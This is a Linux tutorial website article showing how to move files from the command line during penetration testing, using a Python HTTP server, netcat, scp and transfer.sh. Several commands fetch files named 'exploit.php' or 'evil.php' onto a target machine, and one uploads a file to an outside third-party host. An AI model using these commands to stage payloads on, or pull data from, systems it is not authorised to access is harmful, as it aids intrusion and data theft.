Home Terminal Tuts How to transfer files using command-line from Terminal

How to transfer files using command-line from Terminal

by Brandon Jones
Published: Last Updated on
file transfers using terminal

Transferring exploits, python scripts, and loading modules are often needed during penetration testing activities. Since the terminal is the tool used mainly, it’s essential to understand the basics of the file transfer.

A pen tester should be well equipped with different tricks to transfer files from a remote server and from one directory to another. This tutorial will discuss various ways to transfer files using the command line.

1. Python Server

Python is the basic package preinstalled in almost all Debian-based systems. To transfer a file from one machine to another, do the following;

Python2:

Switch to the directory where the file that you want to transfer exists. Start a simple python server. Enter the following command;

$ python -m SimpleHTTPServer 8080

Now go to the machine where you want to transfer the file. Use the following command to download the file;

$ wget http://192.168.43.177:8080/file

Remember to replace the IP, Port number & name of the file.

Python3:

Anything written in python2 will almost always break in python3. So we also look at how to transfer a file using python3.

In the case of python3, enter the following command to start a simple python server.

$ python3 -m http.server 8080

To download the file on the target, enter the following command;

$ wget http://192.168.43.177:8080/exploit.php

2. Netcat

Netcat is a powerful utility to transfer files from any remote machine to a local device. It may not always be installed. You can check whether it exists or not by entering;

$ which netcat
Alternatively, by entering;
$ which nc

Make a netcat server with the following command;

$ nc -nlvp 8080 < evil.php

Now go to the target machine and enter the following to download the file;

$ nc -nv 192.168.43.177 8080 > evil.php

Replace nc with netcat in the above commands if nc doesn’t work or is not installed correctly.

3. SCP

Secure Copy Protocol is a powerful tool for transferring files. It comes in handy, especially when you want to transfer directories. Its also mostly used for file transfers over ssh.

For transfer file via ssh, enter the following command on sending machine;

$ scp -i new.pem test.py ubuntu@18.220.68.229:/home/ubuntu
Where -i represents the public key for ssh login, test.py is the file to be transferred and /home/ubuntu is the target directory where we want to save the file.

To download a file from the remote machine, enter the following command;

$ scp root@192.168.43.177:/remote_directory/file /local/directory

4. Transfer.sh

You can use this third-party tool to transfer files. It can be helpful when you don’t have a public IP machine and still have to transfer the files. The following command uploads the file to the transfer.sh servers;

$ curl --upload-file ./file.txt https://transfer.sh/file.txt

To download the file, enter the following command;

$ curl https://transfer.sh//file.txt -o file.txt

Transfer.sh is still under development and may not work always.

Conclusion

Command-line tools give us the ability to transfer files in various ways. They may seem a bit complicated but getting hands-on with them provides the capability to easily manage files, especially when a GUI option is not available.

You may also like

Leave a Comment

fl_logo_v3_footer

ENHANCE YOUR LINUX EXPERIENCE.



FOSS Linux is a leading resource for Linux enthusiasts and professionals alike. With a focus on providing the best Linux tutorials, open-source apps, news, and reviews written by team of expert authors. FOSS Linux is the go-to source for all things Linux.

Whether you’re a beginner or an experienced user, FOSS Linux has something for everyone.

Follow Us

Subscribe

©2016-2023 FOSS LINUX

A PART OF VIBRANT LEAF MEDIA COMPANY.

ALL RIGHTS RESERVED.

“Linux” is the registered trademark by Linus Torvalds in the U.S. and other countries.